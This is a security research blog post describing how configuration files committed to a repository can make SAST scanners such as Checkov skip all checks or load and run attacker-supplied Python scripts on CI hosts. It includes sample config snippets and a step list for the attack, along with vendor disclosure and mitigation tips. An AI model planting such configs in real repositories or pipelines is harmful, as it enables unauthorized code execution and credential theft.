All blog posts

Malicious code analysis: Abusing SAST (mis)configurations to hack CI systems

What happens when SAST tools do more than just scanning? What if security scanners abuse their privileges?

I recently found a new method that allows secure code analysis mechanisms to be bypassed and even worse — abused to execute malicious code on their host. This allows anyone with access to a source control repository to run malicious code in sensitive environments — which may be abused to steal credentials, access tokens and more.
This is a result of ongoing research around exploiting SAST scanners that was first presented at DEF CON 29 this summer.

Part 1 — Prequel

The number one goal of any hacker is and always will be one thing: running their own {malicious} code on the target computer, or in more professional wording, remote code execution (RCE).

Hackers want to hack production systems. That is where the crown jewels are. Where the confidential data is stored. Where mission-critical tasks are running. There are various ways to gain access to production and numerous different motives for doing this, but they all have one uniting goal: running unauthorized code on production environments.

For a long time now, CI systems, and engineering systems in general, are sought after by hackers due to the ease of getting to production through them. They store sensitive credentials used for deployment, and they have a red carpet paved to production for carrying out the actual deployments.

The attack vector I want to introduce is a new method of attack that allows running malicious code on CI systems, allowing sensitive production credentials to be exfiltrated and malicious artifacts to be deployed.

“Malicious Code Analysis” attack
A method which abuses code analysis software configurations to run code on the host running the code analysis

Part 2 — How it was discovered

Before going deep into the technical areas, I want to share details on what brought me to research the behavior of code analysis software. Developers and builders want to develop as quickly and freely as possible. In a world full of chaos and security issues, we want to be able to develop code in a rapid and frictionless manner, while using various automations such as security guardrails to protect us from making mistakes along the way.

This is where static code analysis (or in short — SAST) solutions come in.

They get code as input, and no matter how malicious or harmful the code is, it will never be executed or cause any harm. The software statically analyses the code and identifies potential flaws. And for this reason, both defenders and developers can safely run this static analysis software against any piece of code without being concerned about the code being executed.

But as a veteran hacker, I know these type of statements are rarely true. There is always an exception.

So, one day I built a simple code scanning solution. Running this solution on random code gave me my desired results — 99% of the time — but every once in a while, the service crashed. Interesting. This means the service was somehow impacted by the actual input (code) it analyzed. So I decided to go down the rabbit hole and debug my scanner and voila — I found out that a certain character combination brought the whole service to its knees.

This character combination was a self-evaluating form in Clojure, meaning that when the scanner read the code it actually tried to execute it.

Self evaluating code in Clojure

One hour later, I had a shiny new code execution vector that runs whenever my code gets scanned.

https://github.com/jonase/kibit/issues/235

So I had a working POC of a scanner that went far beyond the scope of statically analyzing the code it received as input. This started a chain of investigations for what else I can break.

Part 3 — Features evolving into security bugs

Remember Shellshock?

Shellshock was born in 1989, but was only found in 2014. The big mystery here is: how does a 25-year-old bug hide so well?

The answer is quite simple: when the bug was created it wasn’t critical. In short, the feature of assigning a function and executing it from the environment variables was not critical because in order to create an environment variable you had to have local physical access.
Read more here.

Then came the internet. Developers needed a way to interact with processes running on remote computers. The best way to pass data for starting processes in bash was to send them through environment variables. As it is only data it was pretty safe.

Except in bash as we saw earlier we can create functions, and these functions can self execute, just like our self executing functions in Clojure in the previous part.

Part 4- Connecting the dots

Code scanning has similar concepts; from the dawn of development, we had different methods and techniques to scan code. The majority of them involved running the scanner locally on the machine of the developer writing the code. So there hasn’t really been any need to secure the tools themselves.

But wait, we have since connected these tools to the internet, and running them daily in our automations.

The same tools now run as part of our deployment systems, systems to which we grant lots of power and permissions to deploy our most sensitive code. This is a big responsibility to put on tools that were built a decade ago with no intention of running on the internet…

Game on…

Part 5- The Malicious Code Analysis attack

Code pushed into production has to be verified. We have to make sure it doesn’t contain any security flaws or misconfigurations. The more code we have in our organization, the more we need to rely on automatic scanning and safety procedures to make sure everything is running as it should.

The benefits of scanning are great; we can put in guardrails pretty easily — starting from the linting of our code to standardize the way we write code to adding security measures that help react in real-time to new bugs introduced into the code before they actually get deployed to our production systems.

However, like all good things, there are often downsides. Before detailing the risks, let’s align on what code scanning actually is.

What is a code scanner? (i.e. static analysis program)

Static program analysis is the analysis of computer software that is performed without actually executing programs. https://en.wikipedia.org/wiki/Static_program_analysis

I’ll skip the detailed explanation of how scanners work and save this for a future blog. If you want a detailed explanation, you can watch my talk from Defcon29 here.

As head of Marketplace integrations, a big part of my job is getting intimately familiar with SAST scanners — including what they do and how they behave. So I found myself thinking: if I can get one scanner to execute code, there is a high probability that I can get other scanners to misbehave.

My research question became very specific:

Assuming most scanners do intend to perform static analysis, how can I exploit their own behavior to bypass them and even exploit them?

Abusing SAST configuration — Most scanners generate a lot of noise (i.e. findings), with one of the main reasons for this being that they have many preconfigured rules that most certainly don’t apply to all code repositories universally. So by design, each one in its own way has a configuration used to disable different subsets of these rules according to the users’ requirements.

Bypassing the scanners

The first mission I defined was to bypass the scanner. Security puts a lot of effort into automating processes for scanning R&D code to make sure it doesn’t go into production. I wanted to create code that would bypass all those protections, but didn’t want to work hard or rely on getting caught by some custom rulesets of the security team. I wanted to bypass it all.

Here is a walkthrough of the process and research of one of my targets — Checkov:

Checkov is an open-source tool designed to audit “infrastructure as code” files. The tool is super effective in finding flaws and easily shows problems found in our code.

In our example, I wanted to create a privileged pod using terraform. Usually Checkov will scan and fail my deployment (if executed inline inside the CI) or at least alert me.

Reading the documentation shows us that when the scanners are executed, they look for a configuration file inside its target directory.

Adding a .checkov.yml allows us to configure how we want the scanner to behave, including what rules to exclude from the scan. In this case, we want to add a configuration that will never fail any code, and use only my own custom check

soft-fail: true
check:
  - THIS_NOT_THE_CHECK_YOUR_ARE_LOOKING_FOR

Once I add this configuration file, I “pass” the Checkov inspection even though my code has security flaws;

Before adding a config file:

After adding our “custom” config file

Essentially, this means that anyone who wants to bypass the SAST security inspection, for any reason (for example — to release to production faster without any ‘obstacles’ put in place by the security team, can follow these three simple steps:

  1. Create a config file disabling all rules
  2. Put it into the code directory that is to be scanned
  3. Never again deal with failing pipelines

This is not proper advice. Do not try this in you CI/CD pipelines.

Important notice:
We are not blaming or putting responsibility on OSS creators. We should not expect OSS to provide the same level of security as their commercial alternatives. These tools were not build to protect the systems they running in. That is the user’s responsibility.

We should assume OSS projects could potentially contain security flaws and make sure they are properly configured and running in a safe environment.

With this being said: we did reach out to Palo-Alto as they support Checkov commercially. The feedback was very fast and professional and they added a disclaimer to their README regarding this behavior. In addition, they added support for setting the config file, which was previously not possible.

https://github.com/bridgecrewio/checkov/blob/master/README.md

Why did this happen?

Most SAST Engines rely on configuration, usually defining which rules we want to use, setting operation flags, or just even to enable debug mode.

Most scanners use the same convention of searching for a configuration in the working directory or target (scanning) directory. Because the most common use case for running scanners is from the working directory, it is common usage to add a scanning configuration there to define our custom policy.

Because of this behavior, and given access to a repo that is to be scanned, we can “abuse” the scanner logic and tell it to skip all rules, move to debug mode, or worse scenarios (See next chapter)

Is it common?
Below, we can see a list of scanners that accept configuration files in the current working directory. For each one here, adding the “evil” configuration will disable all security testing.

phpstan.neon
--
paths:
  - /var/emptykics.config
--
queries-path: /var/empty.rubocop.yml
--
<%= exit! %>

You can find our opensource repo we released with more researched configuration files here: https://github.com/cider-rnd/cicd-lamb

Detailed explanations can be found in my YouTube video from Defcon.

Attacking the Scanners Right Back

So anyone who has gotten this far is probably asking themselves the same question: if the scanner really picked up my rule configuration, can I do something more interesting than just disable scanner features?

Because lots of scanners are basically frameworks for scanning code, they allow us developers, security engineers or DevOps to add our own custom rules.

These rules are sometimes created as code or have other ways of dynamic configuration loading. This leaves us with the possibility to execute code if and when we are able to override the configuration file.

Going back to the documentation, we can learn that Checkov allows us to load external checks, which is a great feature on its own. But when allowing configuration files to be loaded from the target directory, things can get pretty interesting.

So when we create a folder with python scripts in our target directory (in our example, we named the folder “scripts”), coupled with creating a configuration file that tells the scanner to pick up our custom python code from the requested folder, will result in executing our custom code when running the scan:

external-checks-dir:
  - scripts

So essentially this means that if I am a developer, or any human or application with permission on a source code repo, and I want to run malicious code on the CI, I can achieve my goal by doing the following:

  1. Create my own ‘malicious’ branch of the repo (knowing that when I issue a PR or commit code to this branch it will trigger a scan in the CI).
  2. Add the following payloads to the branch —
  • A custom malicious configuration file
  • malicious files/folders triggered by the configuration file

3. Push / issue a PR (or whatever action will end up triggering the build and running the scan)

4. Drink your favorite drink and wait for the shell to pop

Conclusions

Continuing our research, we created a list of scanners researched where we could find our Malicious Code Analysis attack. I am sure this is just the beginning; there are many other tools that weren’t checked. But now every time I install a new tool I can’t stop myself from thinking: is it vulnerable?

For more detailed examples checkout our CICD Lamb repo
https://github.com/cider-rnd/cicd-lamb

Most security scanning is supposed to find security issues and flaws in code uploaded to our systems. The thought that the code itself will try to target the scanner itself usually is not thought of when designing scanners.

Today in 2021, we are enabling so much automation — with developers, DevOps, SecOps, AppSec engineers each trying to automate away as much of our work as possible in order to meet the continuously growing volume and demand by different organizational stakeholders. It is crucial to understand that this automation can be vulnerable to attacks as well and is being attacked

These automations affect every area of our software development lifecycle (SDLC) — a crucial part of our CI/CD environments — areas that have access to our most sensitive integrations and systems. These areas are the jackpot of all attacks. In this place, silently a shell pops without any understandable reason.

We need to prepare for that day

AfterMath (Fixing our problems)

The first stage of fixing is understanding there is a problem. If you got this far, I hope you are starting to understand, that this is only the tip of the iceberg.

A few tips which will help you in the following quest to prevent these problems:

  • Always scan your code in an ISOLATED environment. Block all internet access; isolate resources such as disk, CPU, network access and finally destroy after use.
  • Create a fixed configuration file, set the scanner to use it and not the default
  • Sanitize your CI/CD environment, and align it with the principle of least privilege. Your scanners need to run in an environment with the minimal possible privilege

Acknowledgments

I want to thank all that supported and helped me with this research.

Cider Security — Which gave me the time and resources to research this finding
Daniel Krivelevich — Who pushed me into doing more thorough research
Sharone Revah Zitzman — Thank you for the enormous impact on the presentation and the blog post
Palo Alto, Barak Schoster — For the quick response and great feedbacks

Special thanks to all the open-source SAST developers and contributors out there, Each one of you is helping the world become a safer place

Cider Security has been acquired by Palo Alto Networks